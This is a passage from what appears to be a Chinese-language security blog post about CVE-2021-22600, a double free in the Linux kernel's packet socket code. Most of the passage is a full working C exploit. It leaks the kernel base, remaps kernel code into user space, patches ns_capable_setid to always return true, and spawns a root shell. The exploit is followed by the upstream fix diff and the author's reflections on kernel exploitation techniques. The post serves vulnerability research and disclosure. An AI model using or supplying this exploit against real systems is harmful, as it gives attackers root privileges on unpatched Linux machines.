#include <stddef.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/mman.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void err_exit(char *msg)
{
printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
if(getuid()) {
log_error("[x] Failed to get the root!");
sleep(5);
exit(EXIT_FAILURE);
}

log_success("[+] Successful to get the root.");
log_info("[*] Execve root shell now...");

system("su root -c sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

void print_banner(void)
{
puts(SUCCESS_MSG("--------- CVE-2021-22600 Exploitation ---------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESS_MSG("--------- User Space Mapping Attack ---------\n"));
}

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
unsigned int tp_retire_blk_tov;
unsigned int tp_sizeof_priv;
unsigned int tp_feature_req_word;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define VICTIM_OBJ_SZ (512 + 8)

#define SKBUFF_DATA_SZ (VICTIM_OBJ_SZ)

#define TP_BLK_SZ 0x1000
#define TP_BLK_NR (VICTIM_OBJ_SZ / sizeof(char*))
#define TP_FRAME_SZ TP_BLK_SZ
#define TP_FRAME_NR (TP_BLK_SZ * TP_BLK_NR / TP_FRAME_SZ)

#define NS_CAPABLE_SETID 0xffffffff810bc5c0

int p2c_pipe[2], c2p_pipe[2];

void exploitation_child(void)
{
struct tpacket_req req;
int socket_fd, version;
size_t buf[0x1000], *pgv_region, kernel_leak, orig_page;
char *kcode_map;
int sk_socket[2];
int ret = 0;

unshare_setup();

if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket) < 0) {
perror("[x] Unable to create socket pair");
err_exit("FAILED at creating socket pair!");
}

log_info("[*] Creating packet socket...");

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
err_exit("FAILED to create socket");
}

log_info("[*] Set socket version to TPACKET_V3...");

version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V3");
}

log_info("[*] Allocating RX ring buffer...");

memset(&req, 0, sizeof(req));
req.tp_block_size = TP_BLK_SZ;
req.tp_block_nr = TP_BLK_NR;
req.tp_frame_size = TP_FRAME_SZ;
req.tp_frame_nr = TP_FRAME_NR;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to allocate RX ring buffer");
}

log_info("[*] Freeing RX ring buffer...");

req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to free RX ring buffer");
}

log_info("[*] Allocating pgv and free to reclaim as sk_buff...");

if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to write sk_sockets");
err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
}

log_info("[*] Free in V2 and reallocate pgv in V3...");

version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V2");
}

req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to free RX ring buffer");
}

version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V3");
}

memset(&req, 0, sizeof(req));
req.tp_block_size = TP_BLK_SZ;
req.tp_block_nr = TP_BLK_NR;
req.tp_frame_size = TP_FRAME_SZ;
req.tp_frame_nr = TP_FRAME_NR;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to allocate RX ring buffer");
}

log_info("[*] Try leaking with sk_buff...");
if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to read sk_sockets");
err_exit("FAILED to read sk_buff to leak data!");
}

/*
for (int i = 0; i < (SKBUFF_DATA_SZ / 8); i++) {
printf("[----data-dump----][%d] %lx\n", i, buf[i]);
}
*/

orig_page = buf[0];
page_offset_base = buf[0] & KASLR_MASK;
buf[0] = page_offset_base + 0x9d000;

for (;;) {
if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to write sk_sockets");
err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
}

pgv_region = mmap(NULL, TP_BLK_SZ * TP_BLK_NR, PROT_READ | PROT_WRITE, MAP_SHARED, socket_fd, 0);
if (pgv_region == MAP_FAILED) {
perror("[x] Unable to do pgv mapping");
err_exit("FAILED to map pgv to user space!");
}

kernel_leak = pgv_region[0];
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
kernel_offset = kernel_base - 0xffffffff81000000;
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(
SUCCESS_MSG("[+] Got kernel base: ") "%lx"
SUCCESS_MSG(", kernel offset: ") "%lx\n",
kernel_base,
kernel_offset
);
printf(SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n", page_offset_base);
break;
}

munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);

if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to read sk_sockets");
err_exit("FAILED to read sk_buff to leak data!");
}

page_offset_base -= KASLR_GRANULARITY;
buf[0] = page_offset_base + 0x9d000;
}

log_info("[*] Start mapping kernel code segment to user space...");

munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);

if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to read sk_sockets");
err_exit("FAILED to read sk_buff to leak data!");
}

buf[0] = NS_CAPABLE_SETID + kernel_offset;
if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to write sk_sockets");
err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
}

pgv_region = mmap(NULL, TP_BLK_SZ * TP_BLK_NR, PROT_READ | PROT_WRITE, MAP_SHARED, socket_fd, 0);
if (pgv_region == MAP_FAILED) {
perror("[x] Unable to do pgv mapping");
err_exit("FAILED to map pgv to user space!");
}

log_info("[*] Start overwriting kernel code segment...");

/**
* The setresuid() check for user's permission by ns_capable_setid(),
* so we can just patch it to let it always return true :)
**/
kcode_map = (char*) pgv_region;
//memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
memcpy(
kcode_map + (NS_CAPABLE_SETID & 0xfff),
"\xf3\x0f\x1e\xfa" /* endbr64 */
"H\xc7\xc0\x01\x00\x00\x00" /* mov rax, 1 */
"\xc3", /* ret */
12
);

log_info("[*] Restoring the original...");

munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);
if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to read sk_sockets");
err_exit("FAILED to read sk_buff to leak data!");
}

buf[0] = orig_page;
if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
perror("[x] Unable to write sk_sockets");
err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
}

log_info("[*] Notifiying parent process...");

/* notify the parent */
write(c2p_pipe[1], "arttnba3", sizeof("arttnba3"));

/* just to keep the child sleeping... */
read(p2c_pipe[0], &ret, sizeof(ret));

sleep(114514);
}

void exploitation(void)
{
char identifier[0x10];
int ret;

print_banner();

bind_core(0);

log_info("[*] Creating child process to user packet socket...");

if (pipe(p2c_pipe) < 0 || pipe(c2p_pipe) < 0) {
perror("[x] Unable to create pipe");
err_exit("FAILED to create pipe for communication!");
}

ret = fork();
if (!ret) {
exploitation_child();
exit(EXIT_SUCCESS);
} else if (ret < 0) {
perror("[x] Unable to fork out child process");
err_exit("FAILED to create child process for exploit!");
}

memset(identifier, '\0', sizeof(identifier));
read(c2p_pipe[0], identifier, sizeof("rat3bant"));

if (strcmp(identifier, "arttnba3")) {
err_exit("WRONG message got from child.");
}

log_info("[*] trigger evil ns_capable_setid() in setresuid()...");

fflush(stdout);
sleep(5);

setresuid(0, 0, 0);
get_root_shell();

system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
exploitation();
return 0;
}

运行即可完成提权,但 依赖于特定的内核镜像中特定内核函数的地址 ,且有一定概率因为定时器而崩溃:

目前笔者想到的可能的的优化方法是想办法去找内核代码段在 page_offset_base 上的偏移(也就是内核镜像在物理内存中的加载地址),不过这一块内存大概率会被配置和内核代码段相同的权限

0x03. 漏洞修复

这个漏洞最终在 这个 commit 当中被修复,修复方式是:

  • rx_owner_map 的释放迁移到与 pg_vec 同步

这确保了 rx_owber_mappg_vec 生命周期的一致性,从而不会被双重释放,不过在笔者看来更要紧的问题是 double booking 的存在,因此笔者个人其实不太满意对这个漏洞的修复止步于此

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 46943a18a10d54..76c2dca7f0a594 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -4492,9 +4492,10 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
}

out_free_pg_vec:
- bitmap_free(rx_owner_map);
- if (pg_vec)
+ if (pg_vec) {
+ bitmap_free(rx_owner_map);
free_pg_vec(pg_vec, order, req->tp_block_nr);
+ }
out:
return err;
}

0xFF. What’s more…

久违但经典的废话环节

好久没有从头写过比较硬核的漏洞分析与利用的文章了( 是的自从 23 年本科毕业之后笔者就很少有时间去对一个内核漏洞做深入透彻的分析与攻击程式的编写了,而前面几篇漏洞分析其实都很水当然这篇也比较水不过含水量可能稍微少一点毕竟在 exp 中有着笔者认为非常有意思的一些小技巧 ),这又让笔者想起了自己刚学 kernel pwn 的那段时间:2020年~2023年可谓是 Linux 内核利用的飞速发展期,这个阶段在无数安全研究员的共同努力下 kernel pwn 的发展直接击穿了从 SLUB allocator 到 buddy system 的每一处细节,从对不同内核结构的深入解析到各种跨缓存的页级攻击手段,再到随之而来的各种不同的防护与缓解措施, Linux kernel 这一战场间攻防对抗的发展速度似乎已经快到还没开始多久就已经结束了 ,page-level heap fengshui、cross-cache attack、 page-level UAF 等深入内存管理最底层的技术似乎直接在攻击技巧上突破了令人难以想象的极限(DirtyCred、DirtyPageTable、之类的仔细一想不都只是 不同形式的衍生物 么,更别提 SLUBStick 之类的换皮以及 PageJack 这样的 抄袭 之物了 ,是的笔者一直有在尝试和 BlackHat 的主办方 argue 这件事情,虽然情况并不乐观但我仍会坚持下去 ),而 SLAB_VIRTUALCONFIG_RANDOM_KMALLOC_CACHES 等防护手段的出现则更是很多传统攻击方法黯然失色,在 2024 年做个普通的 kernel pwn 似乎各种 data-only attack 已经是标配,没有个不依赖特定内核镜像的说明似乎都拿不出手,攻击程式里没有 heap spray 就好像吃饭不用餐具一样抽象,而传统的返回导向编程似乎早已随着控制流完整性和 shadow stack 与 CET 等技术的出现而被扫入历史的垃圾堆,像 userland pwn 一样伪造 freelist 分配 fake chunk 的方法更是早已销声匿迹—— 但接下来呢?

“我们好像过快地爬到了山顶,以至于突然变得无事可做。” 于是在各种高级内核利用技巧井喷式爆发的 2021 ~ 2023 年结束之后, 我们会发现 2024 这一年好像没有什么新的东西能玩了 ,这一年的各大家似乎都在沉寂当中( 当然笔者也什么都没发是因为笔者本来就菜嗷 ),大家好像没有什么值得拿出来修的花活了,这一年明面上的产出似乎只有一些新瓶装旧酒的论文和剽窃抄袭洗稿之物, 在 kernel exploitation 上咱们好像看不到什么本质上新的东西了也可能是笔者见识短浅,谁知道呢 ),大家能做的似乎就只是再翻一翻还有没有埋藏在沙子当中没被发现的珍珠(内核结构体),以及感叹物资的损坏如此之快(逝去的 io_uring 的 4k 菜单堆)

——当然,以 2025 年的眼光重新审视当年淳朴的 USMA,我们会发现和笔者在第一份 exp 当中给出的成熟的现代内核攻击技术相比,强依赖于特定内核镜像的 USMA 似乎并不是一个多么 powerful 的技术,但不得不说的是 在 2022 年的时候这确乎是一个非常亮眼的技术 ,毕竟在此之前没有人曾经想过页面映射机制也能够拿来做如此精妙的攻击,而这也为后面出现的 DirtyPageTable 以及 SLUBStick 等技术提供了指导

而 USMA 又一定要依赖于特定的内核镜像吗?答案似乎也并非如此,通过各种内核对象各种内核函数表,我们可以泄漏出名字和功能已知的内核函数的地址,这无关于内核镜像的内部构造,再配上合适的参数列表与特定构造的 shellcode, 我们其实是有办法将 USMA 转换为通用攻击方法的 ——感兴趣的读者欢迎品尝 由 veritas501 师傅给大家带来的大餐

2018 年的我们还在吃力地用各种内核对象拼凑返回导向编程,而 2023 年的我们已经全面转向泛用性与稳定性高质量发展的现代内核利用技巧,而这 离不开所有安全研究员们的共同努力 ,纵使现在进入了短暂的沉寂期,但笔者相信总会有拔云见日的那一天

懒得写了,摆烂!


【CVE.0x0D】CVE-2021-22600 漏洞分析及利用
https://arttnba3.github.io/2025/04/30/CVE-0X0D-CVE-2021-22600/
作者
arttnba3
发布于
2025年4月30日
许可协议